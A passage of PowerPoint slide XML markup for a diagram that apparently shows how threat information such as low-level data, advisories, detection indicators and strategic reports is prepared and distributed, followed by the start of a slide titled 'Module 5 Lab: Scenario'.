                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEEED936-1216-9945-B14D-C4F2C166F8B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="126360" y="2833560"/>
              <a:ext cx="1598760" cy="337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r">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>low-level data</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="CustomShape 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2386E6F-E3C3-D44F-B0A6-C20784278FCA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3306960"/>
              <a:ext cx="1267920" cy="337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r">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>advisories</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="CustomShape 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBB7BAB9-575B-984D-8E51-7AF5A6E83C83}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="546120" y="3720240"/>
              <a:ext cx="1178640" cy="5832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r">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>detection</a:t>
              </a:r>
              <a:br>
                <a:rPr>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>indicators</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="CustomShape 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13BDDE39-252B-EF4A-935D-378ABB2FF22E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="2703240" y="3308339"/>
              <a:ext cx="1532160" cy="414720"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="009900"/>
            </a:solid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1600" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>prepare</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="CustomShape 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D077E5A9-ED1B-4B47-8DCB-1CB1B07BA0E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="5650560" y="3308339"/>
              <a:ext cx="1522440" cy="414720"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="009900"/>
            </a:solid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1600" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>distribute</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="CustomShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B22DB1AD-50F7-E74E-8ADF-02DCB63A6E5B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7186680" y="2546332"/>
              <a:ext cx="1598400" cy="337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nSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>low-level data</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="CustomShape 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B05FA4A-542D-4341-BACF-1BD864DB6944}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7186680" y="2984812"/>
              <a:ext cx="1316520" cy="337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nSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>advisories</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="CustomShape 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEDBAC6B-9655-CB43-B4F9-C6BA15DB2167}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7186680" y="3423652"/>
              <a:ext cx="1178640" cy="5832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nSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>detection indicators</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="CustomShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2576F943-17B9-7847-A226-E8CD80653C8F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7186680" y="4108372"/>
              <a:ext cx="1829520" cy="337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nSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>strategic reports</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="CustomShape 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CD33135-0733-5042-B953-C961B2FCA859}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2702520" y="3515518"/>
              <a:ext cx="564840" cy="360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="21600"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="28440">
              <a:solidFill>
                <a:srgbClr val="002541"/>
              </a:solidFill>
              <a:miter/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:effectRef>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="43" name="Group 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E27070F-460A-D94C-8954-14CFDDFBDDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6618714" y="2737805"/>
              <a:ext cx="576000" cy="1555787"/>
              <a:chOff x="6618714" y="2652613"/>
              <a:chExt cx="576000" cy="1555787"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="CustomShape 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A627B99-3C7B-554A-9305-703031C133A3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000" flipH="1">
                <a:off x="6618714" y="2652613"/>
                <a:ext cx="576000" cy="824400"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28440">
                <a:solidFill>
                  <a:srgbClr val="002541"/>
                </a:solidFill>
                <a:miter/>
                <a:tailEnd type="triangle" w="lg" len="lg"/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:lnRef>
              <a:fillRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:effectRef>
              <a:fontRef idx="minor"/>
            </p:style>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="CustomShape 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64213E0F-86DE-6542-ACCF-936CE1FC6E3B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000" flipH="1">
                <a:off x="6624394" y="3106981"/>
                <a:ext cx="567360" cy="367560"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28440">
                <a:solidFill>
                  <a:srgbClr val="002541"/>
                </a:solidFill>
                <a:miter/>
                <a:tailEnd type="triangle" w="lg" len="lg"/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:lnRef>
              <a:fillRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:effectRef>
              <a:fontRef idx="minor"/>
            </p:style>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="CustomShape 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1E29FB8-176C-604A-A44C-2757AABE98CE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6625955" y="3476520"/>
                <a:ext cx="564840" cy="170280"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28440">
                <a:solidFill>
                  <a:srgbClr val="002541"/>
                </a:solidFill>
                <a:miter/>
                <a:tailEnd type="triangle" w="lg" len="lg"/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:lnRef>
              <a:fillRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:effectRef>
              <a:fontRef idx="minor"/>
            </p:style>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52" name="CustomShape 23">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68B1611F-2613-2C43-85C6-DDBCF794A94B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6625955" y="3476520"/>
                <a:ext cx="564840" cy="731880"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28440">
                <a:solidFill>
                  <a:srgbClr val="002541"/>
                </a:solidFill>
                <a:miter/>
                <a:tailEnd type="triangle" w="lg" len="lg"/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:lnRef>
              <a:fillRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:effectRef>
              <a:fontRef idx="minor"/>
            </p:style>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="CustomShape 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5782A547-8809-3949-B837-37367BD0BDBE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5636160" y="3515518"/>
              <a:ext cx="564840" cy="360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="21600"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="28440">
              <a:solidFill>
                <a:srgbClr val="002541"/>
              </a:solidFill>
              <a:miter/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:effectRef>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="45" name="Group 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6026769A-758A-2B4C-B1C9-81C08EAAFB28}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1709999" y="3010812"/>
              <a:ext cx="570941" cy="1009773"/>
              <a:chOff x="1709999" y="3002467"/>
              <a:chExt cx="570941" cy="1009773"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="46" name="CustomShape 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B019A298-0A80-F04B-919A-F472CBF573AC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1721359" y="3002467"/>
                <a:ext cx="559440" cy="472320"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 49990"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28440">
                <a:solidFill>
                  <a:srgbClr val="002541"/>
                </a:solidFill>
                <a:miter/>
                <a:tailEnd type="triangle" w="lg" len="lg"/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:lnRef>
              <a:fillRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:effectRef>
              <a:fontRef idx="minor"/>
            </p:style>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="47" name="CustomShape 19">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37089E58-D50E-A940-A161-65BE20F40EDE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000" flipH="1">
                <a:off x="1722580" y="3477640"/>
                <a:ext cx="558360" cy="534600"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 49992"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28440">
                <a:solidFill>
                  <a:srgbClr val="002541"/>
                </a:solidFill>
                <a:miter/>
                <a:tailEnd type="triangle" w="lg" len="lg"/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:lnRef>
              <a:fillRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:effectRef>
              <a:fontRef idx="minor"/>
            </p:style>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="48" name="CustomShape 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C8ABA1D-C8A0-AB41-B271-6E146251E4F4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1709999" y="3474541"/>
                <a:ext cx="564840" cy="360"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21600" h="21600">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="21600" y="21600"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="28440">
                <a:solidFill>
                  <a:srgbClr val="002541"/>
                </a:solidFill>
                <a:miter/>
                <a:tailEnd type="triangle" w="lg" len="lg"/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:lnRef>
              <a:fillRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:scrgbClr r="0" g="0" b="0"/>
              </a:effectRef>
              <a:fontRef idx="minor"/>
            </p:style>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B6DA763-D028-CE4C-A107-D83AD1DDF7C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Module 5 Lab: Scenario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
